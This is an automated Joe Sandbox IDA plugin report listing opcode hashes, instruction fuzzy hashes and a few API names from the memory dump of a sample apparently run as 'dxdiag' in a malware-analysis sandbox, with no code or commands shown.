                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a33f91a27a4aeccfc9f3fb9721e5cd8899e2d19283775b4607b561721dd59f1b
                                                                                                      • Instruction ID: 8b22c1b07ae07e9e8c70e54b2664e987efbc7c12ed24ca91e0e63b8894becd6c
                                                                                                      • Opcode Fuzzy Hash: a33f91a27a4aeccfc9f3fb9721e5cd8899e2d19283775b4607b561721dd59f1b
                                                                                                      • Instruction Fuzzy Hash: EB41DF741093818BC720CF25C8616ABBBF1EF93364F044A5CE5C28B381E3B99945CB9B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f786a1eb69f8401f55855f4f3fd31df1bddefe192891aa7b36f300e25ebbc475
                                                                                                      • Instruction ID: 75762df367a30ba79ec702eae056234a675c2c7c4eda59630da6670717d7c4bd
                                                                                                      • Opcode Fuzzy Hash: f786a1eb69f8401f55855f4f3fd31df1bddefe192891aa7b36f300e25ebbc475
                                                                                                      • Instruction Fuzzy Hash: 40618EB08007419BD3109F28ED4970BBAA0FF4136DF14473DE8AA966F1D375D9A5CB8A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 648467540263f3123b4c02ec5b4132445b1e857d55f0986aeedafcec0d1fb7a4
                                                                                                      • Instruction ID: c9803781c8c3e1c1503bbf2b7e0cb91ad599f48646208f78850af9b5bc693bbc
                                                                                                      • Opcode Fuzzy Hash: 648467540263f3123b4c02ec5b4132445b1e857d55f0986aeedafcec0d1fb7a4
                                                                                                      • Instruction Fuzzy Hash: DB5150B5A483408FD3209F65A88076FB7E4EBC6304F14493EF594A7281EBB8D5018B8B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7da97045892d917d151bcc5c07033d7c408d372ec9e13f9ab9d0c550b62c297c
                                                                                                      • Instruction ID: a69caac395799761bf6e71e20599b88d1efc5e3bd1c132c25f0773fc5f0ec801
                                                                                                      • Opcode Fuzzy Hash: 7da97045892d917d151bcc5c07033d7c408d372ec9e13f9ab9d0c550b62c297c
                                                                                                      • Instruction Fuzzy Hash: 01516DB15087548FE714DF29D49435BBBE1BBC8318F044A2EE5E987350E379DA088F86
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 79894954648a27af2fb2ffeb8b402e5cb964693089f0543b0c71abd2ccfebdb9
                                                                                                      • Instruction ID: 4eb4d543e274e6005dd5ac3d1296328a5cf021be0d14d03e83e5a7fc676d431e
                                                                                                      • Opcode Fuzzy Hash: 79894954648a27af2fb2ffeb8b402e5cb964693089f0543b0c71abd2ccfebdb9
                                                                                                      • Instruction Fuzzy Hash: 98515FB5A483508FD3209F65A88076FB7E4EBC6704F04493EF594A7390DBB8D9018B8B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: ac499be7da668eacc6ab3733cda7f845be0ad4a5ad9f0ceb31502b03eb374089
                                                                                                      • Instruction ID: e982278c98a4a55a51dcc6fb07df31f24c4864dac0726d46ec862b3c15d8158c
                                                                                                      • Opcode Fuzzy Hash: ac499be7da668eacc6ab3733cda7f845be0ad4a5ad9f0ceb31502b03eb374089
                                                                                                      • Instruction Fuzzy Hash: A771E231A086918FC715CB3C885439EBFE16F5A324F19C799D4B99B3E2C7348946CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: b836058826120a22ad1171bfbe91918f388b7e8695f0bc64f326c4c29ef872e3
                                                                                                      • Instruction ID: 61c9cee79081f457ad2a062ba2558c50646c3fe9279bd5e78a79f88c837ed506
                                                                                                      • Opcode Fuzzy Hash: b836058826120a22ad1171bfbe91918f388b7e8695f0bc64f326c4c29ef872e3
                                                                                                      • Instruction Fuzzy Hash: 22518372751A018BC328CE39CC82567B6D3FBE5314728CA3D9196C76E5DA78E8118748
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 87c11cc2aa61918a5ec01a7bc7fdb27d64084d8cc58c4669a92926849c0a8f20
                                                                                                      • Instruction ID: 21dea60bbb219d656e905d7e418e96adc8bcbb3988d6d2a1a81a27e5a390af3f
                                                                                                      • Opcode Fuzzy Hash: 87c11cc2aa61918a5ec01a7bc7fdb27d64084d8cc58c4669a92926849c0a8f20
                                                                                                      • Instruction Fuzzy Hash: 62513B712087955FC724DA28C4912BBB7E2EFCA304F05CA1DE4DA8B385D239ED05D786
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05ba705d4abcc1caf8ae517ee4ae023d52f44c0ca7fa6ea03e4d84e5a78e3aaf
                                                                                                      • Instruction ID: f82dd9b0d87d4a5d6c48483010ad98791815e4d23863ac411e0dcac4d361aaf7
                                                                                                      • Opcode Fuzzy Hash: 05ba705d4abcc1caf8ae517ee4ae023d52f44c0ca7fa6ea03e4d84e5a78e3aaf
                                                                                                      • Instruction Fuzzy Hash: 57515A33A4A98047D328C93C5C213FA6A934FD7230B2D977FE5B2873E1C56D489A5306
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8fb7f438c5c4dca9d542d010704f564aa8c339b5d82f191b9433bdcfd20d3972
                                                                                                      • Instruction ID: d41090bbc5cdf1eee4b9e767fbef583de22e64e79b7a5adf37564b72c8c73a6c
                                                                                                      • Opcode Fuzzy Hash: 8fb7f438c5c4dca9d542d010704f564aa8c339b5d82f191b9433bdcfd20d3972
                                                                                                      • Instruction Fuzzy Hash: 8741FA3170C2654BC7289E2D8D5813ABBD24FC5618F0DCA7AE8C5AB7CBE5789D0097C9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f0501dee0cd475f0528001a804b543f83bb980b08efb0e061e04e26c6bcac48f
                                                                                                      • Instruction ID: 9fa01659ad8de31616e7a3bece4b0ebd12d10b8bf800f35ceca4d3f4b48f7db6
                                                                                                      • Opcode Fuzzy Hash: f0501dee0cd475f0528001a804b543f83bb980b08efb0e061e04e26c6bcac48f
                                                                                                      • Instruction Fuzzy Hash: 5251BF32B656018FD31CCF7CCC82666B6E3EB9531972DC53E9056C77A5DA38E8028748
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 459afc3e467d5247fe6443b366a0b0acd94dcc8ddc2ffa92890ff12f6ad588ef
                                                                                                      • Instruction ID: a12b8c0182a61b8c0dcb24e574365e2446023a880a9609403b6df3a4a4656157
                                                                                                      • Opcode Fuzzy Hash: 459afc3e467d5247fe6443b366a0b0acd94dcc8ddc2ffa92890ff12f6ad588ef
                                                                                                      • Instruction Fuzzy Hash: BB31593BA19B15CFE7089F79D89021B77A2FBCA350F2A847DDA8543652CB35D9018781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d8c4e62ba9308e78600a03fb08915fb589ea36e633141cd22722de6b1452e6b6
                                                                                                      • Instruction ID: 2adf1b471041e318d085131b5c25906aa0ef628fdecf1c7cc439bd873dbe0119
                                                                                                      • Opcode Fuzzy Hash: d8c4e62ba9308e78600a03fb08915fb589ea36e633141cd22722de6b1452e6b6
                                                                                                      • Instruction Fuzzy Hash: 2A21F736B106018BD72CCB38CCA163B7793ABCA31572DC13E9197C73E9DE34A8018614
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 952670a55784d431d970a3eed704d470b0aeab0eb4664b3b35544288deaf35a8
                                                                                                      • Instruction ID: 157f9dc6c30a3f8e7012f38a3543129662c1ccbafda1b3b4c39616780386f915
                                                                                                      • Opcode Fuzzy Hash: 952670a55784d431d970a3eed704d470b0aeab0eb4664b3b35544288deaf35a8
                                                                                                      • Instruction Fuzzy Hash: 9E210E7540D3819BC7149B3888012AFFBA1AF93328F149A6DF5D297292D339C847C71B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ce5268b2cb12f830d2f938287316391b2315b06526712d89e8233c91e4a213b8
                                                                                                      • Instruction ID: 96f90f60e8dd0990346840b1114267e9a804311747d2bbb38bbaf23e5c27bc8a
                                                                                                      • Opcode Fuzzy Hash: ce5268b2cb12f830d2f938287316391b2315b06526712d89e8233c91e4a213b8
                                                                                                      • Instruction Fuzzy Hash: 4E11D632B182220BE75CDE62D8F967B6352E78931070A013EDE47673D1CEB0F801D264
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 4720f93b5e583e1436a46f0c8ff2d578415a284bcd34cb36c7c667644f46f1a2
                                                                                                      • Instruction ID: e867d9d1f28d7a5eba1ee3aa62fd3901ca7eafcffc61e3722708c4ddc888ec81
                                                                                                      • Opcode Fuzzy Hash: 4720f93b5e583e1436a46f0c8ff2d578415a284bcd34cb36c7c667644f46f1a2
                                                                                                      • Instruction Fuzzy Hash: 6A019675A08340ABE3608F289940BABB7E6B78A314F245A2DE5C493255CB75D8428B9D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                      • Instruction ID: 57554b220478db5cbed8bb508ca5b9341bb5a8124f106d97950563f0cb4ed476
                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                      • Instruction Fuzzy Hash: FB112933A042D40EC3268D3C8900566BFA31B97234F1D539AF4B59B2D2D6668D8B9359
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a011a27137bedbfde1d81e6990c257233fd33e675cfd29fd3a4a4d1d0f128886
                                                                                                      • Instruction ID: 38d02f156ba9bea008bfc3cbf089b3dc91c799dc872ea954a9214ded2d150559
                                                                                                      • Opcode Fuzzy Hash: a011a27137bedbfde1d81e6990c257233fd33e675cfd29fd3a4a4d1d0f128886
                                                                                                      • Instruction Fuzzy Hash: E301B5F1B0131147D7209E15A4C0B2FB2A96FA0708F58443ED80497382DFB9FC08C6A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 07a30f681505e4db35b5ed8e54df63b63ef7e515c4b9fc49bbc63e0401b10513
                                                                                                      • Instruction ID: 12b2805a1f20fa8b6142eba5500c80610d2c3edaf282c8c7ce7b4e803315b4ad
                                                                                                      • Opcode Fuzzy Hash: 07a30f681505e4db35b5ed8e54df63b63ef7e515c4b9fc49bbc63e0401b10513
                                                                                                      • Instruction Fuzzy Hash: 45014C293456504BC31A8B39D8E0763BBE2EFE7301F5D85ADC4D28B74AC67ED8064706
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 8d66e0010325b6422922c937078ec9626dcdbb334fde7781a2277a78e48d2e8b
                                                                                                      • Instruction ID: 8711fe80fd9cdcc946cfeee52c3a971414c24b006f2a8bfd417734f7af7e8c33
                                                                                                      • Opcode Fuzzy Hash: 8d66e0010325b6422922c937078ec9626dcdbb334fde7781a2277a78e48d2e8b
                                                                                                      • Instruction Fuzzy Hash: BA0149746142048BE724CB249C21BBBBBD1FB8F304F151A2DE1C5A3191CF64D880C60D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8fe6f0fb5443b9a01c1fbd4e09ae81bf7540544174fd81e1490294d2a34f9ea0
                                                                                                      • Instruction ID: 0c7f04cba0ebecf99243f2c815fb382dab3cd3855d7a05e12ca6b616032a23fd
                                                                                                      • Opcode Fuzzy Hash: 8fe6f0fb5443b9a01c1fbd4e09ae81bf7540544174fd81e1490294d2a34f9ea0
                                                                                                      • Instruction Fuzzy Hash: F6C012BAD8002063C3298A1088601F8A2300686428B0BA328CC5A33B60C1299C4284E8
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                      • Opcode ID: 1a07bbeef6fc36448364366884fe18d673ec2a3ba7b128be2150e116853cae2f
                                                                                                      • Instruction ID: c462c863d7540d378f15546e975ceae7bdcd2c3f8effd4f67c5b55e1d1f3667c
                                                                                                      • Opcode Fuzzy Hash: 1a07bbeef6fc36448364366884fe18d673ec2a3ba7b128be2150e116853cae2f
                                                                                                      • Instruction Fuzzy Hash: 7A3183B09143148FDB40EF69D98965EBBF4BB88304F01853DE499DB364D774A948CF86
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID: #v
                                                                                                      • API String ID: 3664257935-554117064
                                                                                                      • Opcode ID: f6b9515368add2d154cce34743dfe1eab3236b69c5cd9e8125fcbaf6a12fe06c
                                                                                                      • Instruction ID: 336dde16cfeb40de3b2ef609bf2c051ccccdb53c03003955ec431401e460c0aa
                                                                                                      • Opcode Fuzzy Hash: f6b9515368add2d154cce34743dfe1eab3236b69c5cd9e8125fcbaf6a12fe06c
                                                                                                      • Instruction Fuzzy Hash: BEC0027A808400AFCE113FE5FE0A8283E25EB4670670061F4FD4541076DB324936FFA9